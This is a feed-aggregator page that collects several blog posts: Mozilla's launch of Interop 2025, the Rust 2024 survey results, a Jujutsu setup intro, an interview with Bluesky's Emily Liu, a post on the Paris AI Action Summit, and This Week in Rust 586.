Again, this mostly explains how to help from the WebKit side, but these types of participation can easily be transposed to Gecko and Blink. If you have other ideas for fixing bugs, let me know.

Otsukare!

Hacks.Mozilla.OrgLaunching Interop 2025

Launching Interop 2025

The Interop Project is a collaboration between browser vendors and other platform implementors to provide users and web developers with high quality implementations of the web platform.

Each year we select a set of focus areas representing key areas where we want to improve interoperability. Encouraging all browser engines to prioritize common features ensures they become usable for web developers as quickly as possible.

Progress in each engine and the overall Interop score are measured by tracking the pass rate of a set of web-platform tests for each focus area using the Interop dashboard.

Interop 2024

Before introducing the new focus areas for this year, we should look at the successes of Interop 2024.

The Interop score, measuring the percentage of tests that pass in all of the major browser engines, has reached 95% in latest browser releases, up from only 46% at the start of the year. In pre-release browsers it’s even higher — over 97%. This is a huge win that shows how effective Interop can be at aligning browsers with the specifications and each other.

Each browser engine individually achieved a test pass score of 98% in stable browser releases and 99% in pre-release, with Firefox finishing slightly ahead with 98.8% in release and 99.1% in Nightly.

For users, this means features such as requestVideoFrameCallback, Declarative Shadow DOM, and Popover, which a year ago only had limited availability, are now implemented interoperably in all browsers.

Interop 2025

Building on Interop 2024’s success, we are excited to continue the project into 2025. This year we have 19 focus areas; 17 new and 2 from previous years. A full description of all the focus areas is available in the Interop repository.

From 2024 we’re carrying forward Layout (really “Flexbox and Grid”), and Pointer and Mouse Events. These are important platform primitives where the Interop project has already led to significant interoperability improvements. However, with technologies that are so fundamental to the modern web we think it’s important to set ambitious goals and continue to prioritize these areas, creating rock solid foundations for developers to build on.

The new focus areas represent a broad cross section of the platform. Many of them — like Anchor Positioning and View Transitions — have been identified from clear developer demand in surveys such as State of HTML and State of CSS. Inclusion in Interop will ensure they’re usable as soon as possible.

In addition to these high profile new features, we’d like to highlight some lesser-known focus areas and explain why we’re pleased to see them in Interop.

Storage Access

At Mozilla user privacy is a core principle. One of the most common methods for tracking across the web is via third-party cookies. When sites request data from external services, the service can store data that’s re-sent when another site uses the same service. Thus the service can follow the user’s browsing across the web.

To counter this, Firefox’s “Total Cookie Protection” partitions storage so that third parties receive different cookie data per site and thus reduces tracking. Other browsers have similar policies, either by default or in private browsing modes.

However, in some cases, non-tracking workflows such as SSO authentication depend on third party cookies. Storage partitioning can break these workflows, and browsers currently have to ship site-specific workarounds. The Storage Access API solves this by letting sites request access to the unpartitioned cookies. Interop here will allow browsers to advance privacy protections without breaking critical functionality.
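As a rough sketch of how a site might use it (the SSO scenario and function name are illustrative; the two calls are the standard Storage Access API):

// Runs inside a third-party iframe (for example, an SSO widget), after a user gesture.
async function ensureCookieAccess() {
  if (await document.hasStorageAccess()) {
    return true;  // we already have access to our unpartitioned cookies
  }
  try {
    await document.requestStorageAccess();  // may prompt the user; must follow a user gesture
    return true;
  } catch (e) {
    return false;  // the browser (or the user) declined the request
  }
}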

Web Compat

The Web Compat focus area is unique in Interop. It isn’t about one specific standard, but focuses on browser bugs known to break sites. These are often in older parts of the platform with long-standing inconsistencies. Addressing these requires either aligning implementations with the standard or, where that would break sites, updating the standard itself.

One feature in the Web Compat focus area for 2025 is CSS Zoom. Originally a proprietary feature in Internet Explorer, it allowed scaling layout by adjusting the computed dimensions of elements at a time before CSS transforms. WebKit reverse-engineered it, bringing it into Blink, but Gecko never implemented it, due to the lack of a specification and the complexities it created in layout calculations.

Unfortunately, a feature not being standardised doesn’t prevent developers from using it. Use of CSS Zoom led to layout issues on some sites in Firefox, especially on mobile. We tried various workarounds and have had success using interventions to replace zoom with CSS transforms on some affected sites, but an attempt to implement the same approach directly in Gecko broke more sites than it fixed and was abandoned.
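The difference between the two mechanisms is easiest to see in a small sketch (the element is illustrative): zoom changes the element’s computed layout dimensions, while a transform only scales the rendered output, which is why it isn’t a drop-in replacement:

const sheet = document.querySelector(".worksheet");  // illustrative element

// CSS zoom: the element's computed dimensions change, so surrounding layout reflows.
sheet.style.zoom = "0.8";

// CSS transform: only the painted output is scaled; the element keeps its original layout box.
sheet.style.transform = "scale(0.8)";
sheet.style.transformOrigin = "top left";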

The situation seemed to be at an impasse until 2023 when Google investigated removing CSS Zoom from Chromium. Unfortunately, it turned out that some use cases, such as Microsoft Excel Online’s worksheet zoom, depended on the specific behaviour of CSS Zoom, so removal was not feasible. However, having clarified the use cases, the Chromium team was able to propose a standardized model for CSS Zoom that was easier to implement without compromising compatibility. This proposal was accepted by the CSS WG and led to the first implementation of CSS Zoom in Firefox 126, 24 years after it was first released in Internet Explorer.

With Interop 2025, we hope to bring the story of CSS Zoom to a close with all engines finally converging on the same behaviour, backed by a real open standard.

WebRTC

Video conferencing is now an essential feature of modern life, and in-browser video conferencing offers both ease of use and high security, as users are not required to download a native binary. Most web-based video conferencing relies on the WebRTC API, which offers high level tools for implementing real time communications. However, WebRTC has long suffered from interoperability issues, with implementations deviating from the standards and requiring nonstandard extensions for key features. This resulted in confusion and frustration for users and undermined trust in the web as a reliable alternative to native apps.

Given this history, we’re excited to see WebRTC in Interop for the first time. The main part of the focus area is the RTCRtpScriptTransform API, which enables cross browser end-to-end encryption. Although there’s more to be done in the future, we believe Interop 2025 will be a big step towards making WebRTC a truly interoperable web standard.

Removing Mutation Events

The focus area for Removing Mutation Events is the first time Interop has been used to coordinate the removal of a feature. Mutation events fire when the DOM changes, meaning the event handlers run on the critical path for DOM manipulation, causing major performance issues, and significant implementation complexity. Despite the fact that they have been implemented in all engines, they’re so problematic that they were never standardised. Instead, mutation observers were developed as a standard solution for the use cases of mutation events without their complexity or performance problems. Almost immediately after mutation observers were implemented, a Gecko bug was filed:

“We now have mutation observers, and we’d really like to kill support for mutation events at some point in the future. Probably not for a while yet.”

That was in 2012. The difficulty is the web’s core commitment to backwards compatibility. Removing features that people rely on is unacceptable. However, last year Chromium determined that use of mutation events had dropped low enough to allow a “deprecation trial”, disabling mutation events by default, but allowing specific sites to re-enable them for a limited time.

This is good news, but long-running deprecation trials can create problems for other browsers. Disabling the feature entirely can break sites that rely on the opt-out. On the other hand we know from experience that some sites actually function better in a browser with mutation events disabled (for example, because they are used for non-critical features, but impact performance).

By including this removal in Interop 2025, we can ensure that mutation events are fully removed in 2025 and end the year with reduced platform complexity and improved web performance.
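For sites still listening to mutation events, mutation observers cover the same use cases and run off the critical path; here is a minimal migration sketch (the target element and handler are illustrative):

// Before: the legacy, never-standardised event
// target.addEventListener("DOMNodeInserted", (e) => onNodeAdded(e.target));

// After: the standard replacement, delivered in batches
const observer = new MutationObserver((records) => {
  for (const record of records) {
    record.addedNodes.forEach((node) => onNodeAdded(node));
  }
});
observer.observe(target, { childList: true, subtree: true });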

Interop Investigations

As well as focus areas, the Interop project also runs investigations aimed at long-term interoperability improvements in areas where we can’t measure progress using test pass rates. For example, Interop investigations can look to add new test capabilities or increase the test coverage of platform features.

Accessibility Investigation

The accessibility testing investigation started as part of Interop 2023. It has added APIs for testing accessible name and computed role, as well as more than 1000 new tests. Those tests formed the Accessibility focus area in Interop 2024, which achieved an Interop score of 99.7%.

In 2025 the focus will be expanding the testability of accessibility features. Mozilla is working on a prototype of AccessibleNode, an API that enables verifying the shape of the accessibility tree, along with its states and properties. This will allow us to test the effect of features like CSS display: contents or ::before/::after on the accessibility tree.

Mobile Testing Investigation

Today, all Interop focus areas are scored in desktop browsers. However, some features are mobile-specific or have interoperability challenges unique to mobile.

Improving mobile testing has been part of Interop since 2023, and in that time we’ve made significant progress standing up mobile browsers in web-platform-tests CI systems. Today we have reliable runs of Chrome and Firefox Nightly on Android, and Safari runs on iOS are expected soon. However, some parts of our test framework were written with desktop-specific assumptions in the design, so the focus for 2025 will be on bringing mobile testing to parity with desktop. The goal is to allow mobile-specific focus areas in future Interop projects, helping improve interoperability across all device types.

Driving the Web Forward

The unique and distinguishing feature of the web platform is its basis in open standards, providing multiple implementations and user choice. Through the Interop project, web platform implementors collaborate to ensure that these core strengths are matched by a seamless user experience across browsers.

With focus areas covering some of the most important new and existing areas of the modern web, Interop 2025 is set to deliver some of the biggest interoperability wins of the project so far. We are confident that Firefox and other browsers will rise to the challenge, providing users and developers with a more consistent and reliable web platform.

Partner Announcements

The post Launching Interop 2025 appeared first on Mozilla Hacks - the Web developer blog.

The Rust Programming Language Blog2024 State of Rust Survey Results

Hello, Rustaceans!

The Rust Survey Team is excited to share the results of our 2024 survey on the Rust Programming language, conducted between December 5, 2024 and December 23, 2024. As in previous years, the 2024 State of Rust Survey was focused on gathering insights and feedback from Rust users, and all those who are interested in the future of Rust more generally.

This ninth edition of the survey surfaced new insights and learning opportunities straight from the global Rust language community, which we will summarize below. In addition to this blog post, we have also prepared a report containing charts with aggregated results of all questions in the survey.

Our sincerest thanks to every community member who took the time to express their opinions and experiences with Rust over the past year. Your participation will help us make Rust better for everyone.

There's a lot of data to go through, so strap in and enjoy!

Participation

Survey   Started   Completed   Completion rate   Views
2023     11 950    9 710       82.2%             16 028
2024     9 450     7 310       77.4%             13 564

As shown above, in 2024, we have received fewer survey views than in the previous year. This was likely caused simply by the fact that the survey ran only for two weeks, while in the previous year it ran for almost a month. However, the completion rate has also dropped, which seems to suggest that the survey might be a bit too long. We will take this into consideration for the next edition of the survey.

Community

The State of Rust survey not only gives us excellent insight into how many Rust users around the world are using and experiencing the language but also gives us insight into the makeup of our global community. This information gives us a sense of where the language is being used and where access gaps might exist for us to address over time. We hope that this data and our related analysis help further important discussions about how we can continue to prioritize global access and inclusivity in the Rust community.

Same as every year, we asked our respondents which country they live in. The top 10 countries represented were, in order: United States (22%), Germany (14%), United Kingdom (6%), France (6%), China (5%), Canada (3%), Netherlands (3%), Russia (3%), Australia (2%), and Sweden (2%). We are happy to see that Rust is enjoyed by users from all around the world! You can try to find your country in the chart below:

We also asked whether respondents consider themselves members of a marginalized community. Out of those who answered, 74.5% selected no, 15.5% selected yes, and 10% preferred not to say.

We have asked the group that selected “yes” which specific groups they identified as being a member of. The majority of those who consider themselves a member of an underrepresented or marginalized group in technology identify as lesbian, gay, bisexual, or otherwise non-heterosexual. The second most selected option was neurodivergent at 46% followed by trans at 35%.

<noscript> <img alt="which-marginalized-group" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-marginalized-group.png" /> </noscript>
[PNG] [SVG]

Each year, we must acknowledge the diversity, equity, and inclusivity (DEI) related gaps in the Rust community and open source as a whole. We believe that excellent work is underway at the Rust Foundation to advance global access to Rust community gatherings and distribute grants to a diverse pool of maintainers each cycle, which you can learn more about here. Even so, global inclusion and access is just one element of DEI, and the survey working group will continue to advocate for progress in this domain.

Rust usage

The number of respondents that self-identify as a Rust user was quite similar to last year, around 92%. This high number is not surprising, since we primarily target existing Rust developers with this survey.

Similarly to last year, around 31% of those who did not identify as Rust users cited the perception of difficulty as the primary reason for not using Rust. The most common reason for not using Rust was that the respondents simply haven’t had the chance to try it yet.

<noscript> <img alt="why-dont-you-use-rust" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/why-dont-you-use-rust.png" /> </noscript>

Of the former Rust users who participated in the 2024 survey, 36% cited factors outside their control as a reason why they no longer use Rust, which is a 10pp decrease from last year. This year, we also asked respondents if they would consider using Rust again if an opportunity comes up, which turns out to be true for a large fraction of the respondents (63%). That is good to hear!

<noscript> <img alt="why-did-you-stop-using-rust" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/why-did-you-stop-using-rust.png" /> </noscript>

Closed answers marked with N/A were not present in the previous version(s) of the survey.

Those not using Rust anymore told us that it is because they don't really need it (or the goals of their company changed) or because it was not the right tool for the job. A few reported being overwhelmed by the language or its ecosystem in general or that switching to or introducing Rust would have been too expensive in terms of human effort.

Of those who used Rust in 2024, 53% did so on a daily (or nearly daily) basis — an increase of 4pp from the previous year. We can observe an upward trend in the frequency of Rust usage over the past few years, which suggests that Rust is being increasingly used at work. This is also confirmed by other answers mentioned in the Rust at Work section later below.

<noscript> <img alt="how-often-do-you-use-rust" height="300" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/how-often-do-you-use-rust.png" /> </noscript>
[PNG] [SVG]

Rust expertise is also continually increasing amongst our respondents! 20% of respondents can write (only) simple programs in Rust (a decrease of 3pp from 2023), while 53% consider themselves productive using Rust — up from 47% in 2023. While the survey is just one tool to measure the changes in Rust expertise overall, these numbers are heartening as they represent knowledge growth for many Rustaceans returning to the survey year over year.

<noscript> <img alt="how-would-you-rate-your-rust-expertise" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/how-would-you-rate-your-rust-expertise.png" /> </noscript>
[PNG] [SVG]

Unsurprisingly, the most popular version of Rust is latest stable, either the most recent one or whichever comes with the users' Linux distribution. Almost a third of users also use the latest nightly release, due to various reasons (see below). However, it seems that the beta toolchain is not used much, which is a bit unfortunate. We would like to encourage Rust users to use the beta toolchain more (e.g. in CI environments) to help test soon-to-be stabilized versions of Rust.

<noscript> <img alt="which-version-of-rust-do-you-use" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-version-of-rust-do-you-use.png" /> </noscript>

People that use the nightly toolchain mostly do it to gain access to specific unstable language features. Several users have also mentioned that rustfmt works better for them on nightly or that they use the nightly compiler because of faster compilation times.

<noscript> <img alt="if-you-use-nightly-why" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/if-you-use-nightly-why.png" /> </noscript>

Learning Rust

To use Rust, programmers first have to learn it, so we are always interested in finding out how they approach that. Based on the survey results, it seems that most users learn from Rust documentation and also from The Rust Programming Language book, which has been a favourite learning resource of new Rustaceans for a long time. Many people also seem to learn by reading the source code of Rust crates. The fact that both the documentation and source code of tens of thousands of Rust crates is available on docs.rs and GitHub makes this easier.

<noscript> <img alt="what-kind-of-learning-materials-have-you-consumed" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-kind-of-learning-materials-have-you-consumed.png" /> </noscript>

In terms of answers belonging to the "Other" category, they can be clustered into three categories: people using LLM (large language model) assistants (Copilot, ChatGPT, Claude, etc.), reading the official Rust forums (Discord, URLO) or being mentored while contributing to Rust projects. We would like to extend a big thank you to those making our spaces friendly and welcoming for newcomers, as it is important work and it pays off. Interestingly, a non-trivial number of people "learned by doing" and used rustc error messages and clippy as a guide, which is a good indicator of the quality of Rust diagnostics.

In terms of formal education, it seems that Rust has not yet penetrated university curriculums, as this is typically a very slowly moving area. Only a very small number of respondents (around 3%) have taken a university Rust course or used university learning materials.

<noscript> <img alt="have-you-taken-a-rust-course" height="400" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/have-you-taken-a-rust-course.png" /> </noscript>
[PNG] [SVG]

Programming environment

In terms of operating systems used by Rustaceans, Linux was the most popular choice, and it seems that it is getting increasingly popular year after year. It is followed by macOS and Windows, which have a very similar share of usage.

As you can see in the wordcloud, there are also a few users that prefer Arch, btw.

Rust programmers target a diverse set of platforms with their Rust programs. We saw a slight uptick in users targeting embedded and mobile platforms, but otherwise the distribution of platforms stayed mostly the same as last year. Since the WebAssembly target is quite diverse, we have split it into two separate categories this time. Based on the results it is clear that when using WebAssembly, it is mostly in the context of browsers (23%) rather than other use-cases (7%).

<noscript> <img alt="which-os-do-you-target" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-os-do-you-target.png" /> </noscript>

We cannot of course forget the favourite topic of many programmers: which IDE (developer environment) they use. Although Visual Studio Code still remains the most popular option, its share has dropped by 5pp this year. On the other hand, the Zed editor seems to have gained considerable traction recently. The small percentage of those who selected "Other" are using a wide range of different tools: from CursorAI to classics like Kate or Notepad++. Special mention to the 3 people using "ed", that's quite an achievement.

<noscript> <img alt="what-ide-do-you-use" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-ide-do-you-use.png" /> </noscript>

You can also take a look at the linked wordcloud that summarizes open answers to this question (the "Other" category), to see what other editors are also popular.

Rust at Work

We were excited to see that more and more people use Rust at work for the majority of their coding, 38% vs 34% from last year. There is a clear upward trend in this metric over the past few years.

The usage of Rust within companies also seems to be rising, as 45% of respondents answered that their organisation makes non-trivial use of Rust, which is a 7pp increase from 2023.

<noscript> <img alt="how-is-rust-used-at-your-organization" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/how-is-rust-used-at-your-organization.png" /> </noscript>
[PNG] [SVG]

Once again, the top reason employers of our survey respondents invested in Rust was the ability to build relatively correct and bug-free software. The second most popular reason was Rust’s performance characteristics. 21% of respondents that use Rust at work do so because they already know it, and it's thus their default choice, an uptick of 5pp from 2023. This seems to suggest that Rust is becoming one of the baseline languages of choice for more and more companies.

<noscript> <img alt="why-you-use-rust-at-work" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/why-you-use-rust-at-work.png" /> </noscript>
[PNG] [SVG]

Similarly to the previous year, a large percentage of respondents (82%) report that Rust helped their company achieve its goals. In general, it seems that programmers and companies are quite happy with their usage of Rust, which is great!

<noscript> <img alt="which-statements-apply-to-rust-at-work" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-statements-apply-to-rust-at-work.png" /> </noscript>
[PNG] [SVG]

In terms of technology domains, the situation is quite similar to the previous year. Rust seems to be especially popular for creating server backends, web and networking services and cloud technologies. It also seems to be gaining more traction for embedded use-cases.

<noscript> <img alt="technology-domain" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/technology-domain.png" /> </noscript>

You can scroll the chart to the right to see more domains. Note that the Automotive domain was not offered as a closed answer in the 2023 survey (it was merely entered through open answers), which might explain the large jump.

It is exciting to see the continued growth of professional Rust usage and the confidence so many users feel in its performance, control, security and safety, enjoyability, and more!

Challenges

As always, one of the main goals of the State of Rust survey is to shed light on challenges, concerns, and priorities on Rustaceans’ minds over the past year.

We have asked our users about aspects of Rust that limit their productivity. Perhaps unsurprisingly, slow compilation was at the top of the list, as it seems to be a perennial concern of Rust users. As always, there are efforts underway to improve the speed of the compiler, such as enabling the parallel frontend or switching to a faster linker by default. We invite you to test these improvements and let us know if you encounter any issues.

Other challenges included subpar support for debugging Rust and high disk usage of Rust compiler artifacts. On the other hand, most Rust users seem to be very happy with its runtime performance, the correctness and stability of the compiler and also Rust's documentation.

<noscript> <img alt="which-problems-limit-your-productivity" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-problems-limit-your-productivity.png" /> </noscript>

In terms of specific unstable (or missing) features that Rust users want to be stabilized (or implemented), the most desired ones were async closures and if/while let chains. Well, we have good news! Async closures will be stabilized in the next version of Rust (1.85), and let chains will hopefully follow soon after, once Edition 2024 is released (which will also happen in Rust 1.85).
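
For readers who have not followed these features, here is a minimal sketch of what the two look like in code. This is illustrative only: async closures are stable as of Rust 1.85, while the let-chain syntax assumes a toolchain where the feature has landed (edition 2024 on a new enough compiler, or nightly with the feature gate), and the tokio dependency is only there to drive the async example.

// Minimal sketch; assumes Rust 1.85+, edition 2024, and a tokio dependency.
#[tokio::main]
async fn main() {
    // Async closures: closures that directly produce a future,
    // implementing the new AsyncFn family of traits.
    let double = async |x: u32| x * 2;
    assert_eq!(double(21).await, 42);

    // Let chains: combine `let` patterns and boolean conditions in a
    // single `if`, instead of nesting `if let` blocks.
    let maybe_id: Option<u32> = Some(42);
    if let Some(id) = maybe_id && id > 10 {
        println!("processing {id}");
    }
}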

Other coveted features are generators (both sync and async) and more powerful generic const expressions. You can follow the Rust Project Goals to track the progress of these (and other) features.

<noscript> <img alt="which-features-do-you-want-stabilized" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-features-do-you-want-stabilized.png" /> </noscript>

In the open answers to this question, people were really helpful and tried hard to describe the most notable issues limiting their productivity. We have seen mentions of struggles with async programming (an all-time favourite), the debuggability of errors (which people generally love, but which is not perfect for everyone), and Rust tooling being slow or resource-intensive (rust-analyzer and rustfmt). Some users also want a better IDE story and improved interoperability with other languages.

This year, we have also included a new question about the speed of Rust's evolution. While most people seem to be content with the status quo, more than a quarter of people who responded to this question would like Rust to stabilize and/or add features more quickly, and only 7% of respondents would prefer Rust to slow down or completely stop adding new features.

<noscript> <img alt="what-do-you-think-about-rust-evolution" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-do-you-think-about-rust-evolution.png" /> </noscript>
[PNG] [SVG]

Interestingly, when we asked respondents about their main worries for the future of Rust, one of the top answers remained the worry that Rust will become too complex. This seems to be in contrast with the answers to the previous question. Perhaps Rust users consider the complexity of Rust to be manageable today, but worry that one day it might become too much.

We are happy to see that the number of respondents concerned about Rust Project governance and insufficient support from the Rust Foundation has dropped by about 6pp from 2023.

<noscript> <img alt="what-are-your-biggest-worries-about-rust" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-are-your-biggest-worries-about-rust.png" /> </noscript>

Looking ahead

Each year, the results of the State of Rust survey help reveal the areas that need improvement across the Rust Project and ecosystem, as well as the aspects that are working well for our community.

If you have any suggestions for the Rust Annual survey, please let us know!

We are immensely grateful to those who participated in the 2024 State of Rust Survey and facilitated its creation. While there are always challenges associated with developing and maintaining a programming language, this year we were pleased to see a high level of survey participation and candid feedback that will truly help us make Rust work better for everyone.

If you’d like to dig into more details, we recommend browsing through the full survey report.

Andrew HalberstadtUsing Jujutsu With Mozilla Unified

With Mozilla’s migration from hg.mozilla.org to Github drawing near, the clock is ticking for developers still using Mercurial to find their new workflow. I previously blogged about how Jujutsu can help here, so please check that post out first if you aren’t sure what Jujutsu is, or whether it’s right for you. If you know you want to give it a shot, read on for a tutorial on how to get everything set up!

We’ll start with an existing Mercurial clone of mozilla-unified, convert it to use git-cinnabar and then set up Jujutsu using the co-located repo method. Finally I’ll cover some tips and tricks for using some of the tooling that relies on version control.

The Mozilla BlogBluesky’s Emily Liu on rethinking social media (and why it’s time to chime in)

[Photo: A smiling woman in a brown jacket stands on a busy city street. Caption: Emily Liu is the head of special projects at Bluesky.]

Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and how they would design their own corner of the web.

We caught up with Emily Liu, head of special projects at Bluesky, as the open-source platform celebrates its first year launching to the public (you can follow Firefox on Bluesky here). She talks about how social media has changed over the last decade, her love for public forums and how her path started with a glitter cursor. 

What is your favorite corner of the internet? 

I’m at the two extremes on the spectrum of private to public content: 

Firstly, I love a good iMessage group text, especially when it’s moving at 100 miles per hour. I strongly believe that everyone needs a good group chat.

At the same time, I love public web forums. This feels like something that’s increasingly rare on the internet as more of us move to private group apps, and I worry that this is equivalent to pulling the ladder up behind us for those who haven’t found those private spaces yet. So I try to do my part by chiming in on public forums when I can offer something useful.

What is the one tab you always regret closing?

I live by Google Calendar and have widgets for it on probably every digital surface — my desktop, my phone lock screen, my laptop side menu, and of course, multiple tabs simultaneously. If something’s not on my calendar, it’s probably not happening.

What can you not stop talking about on the internet right now?

I’m super excited about Bluesky. Obviously I’m unbiased (I work here). We launched the Bluesky app publicly only in February 2024, and under a year later, we crossed 30M people on the network. But the real measure of Bluesky’s growth is that my family has started sending me news articles and asking, “Hey, isn’t this where you work?”

Social networks have become vital public infrastructure, whether it’s to get the latest breaking news, find jobs and opportunities, or stay in touch with our friends and family. Yet over the last decade, closed networks have locked users in, preventing competition and innovation in social media as their services deteriorate. On the other hand, Bluesky is both a social app where your experience online is yours to customize, and an open network that reintroduces competition to social media. This also means that the social network isn’t defined by whoever the CEO is, however capricious they might be.

What was the first online community you engaged with?

In middle school, I ran an anonymous fashion blog on Tumblr. This was before Tumblr had group chats, so internet friends and I co-opted the product by creating a makeshift group DM — a private blog with multiple owners, where every message we sent was really just a post on a private blog. Where there is a will, there is a way, and people are infinitely creative; this is where I learned that the product you design may not be the product that users adopt.

Tumblr was also where I wrote my first lines of code out of desperation for a better blog theme than what the default marketplace provided. Who would’ve thought that adding a visitor counter and a glitter cursor would’ve led me to this point!

If you could create your own corner of the internet, what would it look like?

I feel lucky that in a sense, I am doing this right now through Bluesky. On one hand, there’s the Bluesky app itself. There’s still a bunch of low-hanging fruit to reach feature parity with other social networks, but on top of that, I’m excited about tweaks that might make social media less of a “torment nexus” that other apps haven’t tried yet. Maybe I shouldn’t share them here just yet since I know a certain other company likes to implement Bluesky’s ideas. 😉

And on the other hand, Bluesky is already so customizable that I can configure my experience to be what I want. For example, I’m a big fan of the Quiet Posters custom feed, which shows you posts from people you follow who don’t often post that much, giving you a cozier feel of the network.

What articles and/or videos are you waiting to read/watch right now?

I have so many open tabs and unread newsletters about China and AI that I need to get to.

What role do you see open web projects like Bluesky playing in shaping the future of the web?

I see Bluesky as just one contributor in the mission of building an open web — we’re not the first project to build an open social network, and we won’t be the last. The collaboration and constructive criticism from other players has been immensely useful. Recently, some independent groups have begun building alternative ATProto infrastructure, which I’m particularly excited about. (ATProto, or the AT Protocol, is the open standard that Bluesky is built upon.) Bluesky’s vision of a decentralized and open social web only comes to fruition when users actually have alternatives to choose from, so I’m rooting for all of these projects too.


Emily Liu is the head of special projects at Bluesky, an open social network that gives creators independence from platforms, developers the freedom to build, and users a choice in their experience. Previously, Emily built election models and visualizations at The Washington Post, archival tooling at The New York Times, and automated fact-checking at the Duke Reporters’ Lab.

The post Bluesky’s Emily Liu on rethinking social media (and why it’s time to chime in) appeared first on The Mozilla Blog.

The Mozilla BlogParis AI Action Summit: A milestone for open and Public AI

As we close out the Paris AI Action Summit, one thing is clear: the conversation around open and Public AI is evolving—and gaining real momentum. Just over a year ago at Bletchley Park, open source AI was framed as a risk. In Paris, we saw a major shift. There is now a growing recognition that openness isn’t just compatible with AI safety and advancing public interest AI—it’s essential to it.

We have been vocal supporters of an ecosystem grounded in open competition and trustworthy AI —one where innovation isn’t walled off by dominant players or concentrated in a single geography. Mozilla, therefore, came to this Summit with a clear and urgent message: AI must be open, human-centered, and built for the public good. And across discussions, that message resonated.

Open source AI is entering the conversation in a big way

Two particularly notable moments stood out:

  • European Commission President Ursula von der Leyen spoke about Europe’s “distinctive approach to AI,” emphasizing collaborative, open-source solutions as a path forward.
  • India’s Prime Minister Narendra Modi reinforced this vision, calling for open source AI systems to enhance trust and transparency, reduce bias, and democratize technology.

These aren’t just words. The investments and initiatives announced at this Summit mark a real turning point. From the launch of Current AI, an initial $400M public interest AI partnership supporting open source development, to ROOST, a new nonprofit making AI safety tools open and accessible, to the €109 billion investment in AI computing infrastructure announced by President Macron, the momentum is clear. Add to that strong signals from the EU and India, and this Summit stands out as one of the most positive and proactive international gatherings on AI so far.

At the heart of this is Public AI—the idea that we need infrastructure beyond private, purely profit-driven AI. That means building AI that serves society and promotes true innovation even when it doesn’t fit neatly into short-term business incentives. The conversations in Paris show that we’re making progress, but there’s more work to do.

Looking ahead to the next AI summit

Momentum is building, and we must forge onward. The next AI Summit in India will be a critical moment to review the progress on these announcements and ensure organizations like Mozilla—those fighting for open and Public AI infrastructure—have a seat at the table.

Mozilla is committed to turning this vision into reality—no longer a distant, abstract idea, but a movement already in motion.

A huge thanks to the organizers, partners, and global leaders driving this conversation forward. Let’s keep pushing for AI that serves humanity—not the other way around.

––Mitchell Baker
Chairwoman, Mozilla
Paris AI Action Summit Steering Committee Member

The post Paris AI Action Summit: A milestone for open and Public AI appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 586

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
FOSDEM
Miscellaneous

Crate of the Week

This week's crate is esp32-mender-client, a client for ESP32 to execute firmware updates and remote commands.

Thanks to Kelvin for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No Calls for participation were submitted this week.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

462 pull requests were merged in the last week

Rust Compiler Performance Triage

A relatively neutral week, with lots of real changes but most small in magnitude. Most significant change is rustdoc's move of JS/CSS minification to build time which cut doc generation times on most benchmarks fairly significantly.

Triage done by @simulacrum. Revision range: 01e4f19c..c03c38d5

3 Regressions, 5 Improvements, 1 Mixed; 2 of them in rollups. 32 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust
Cargo
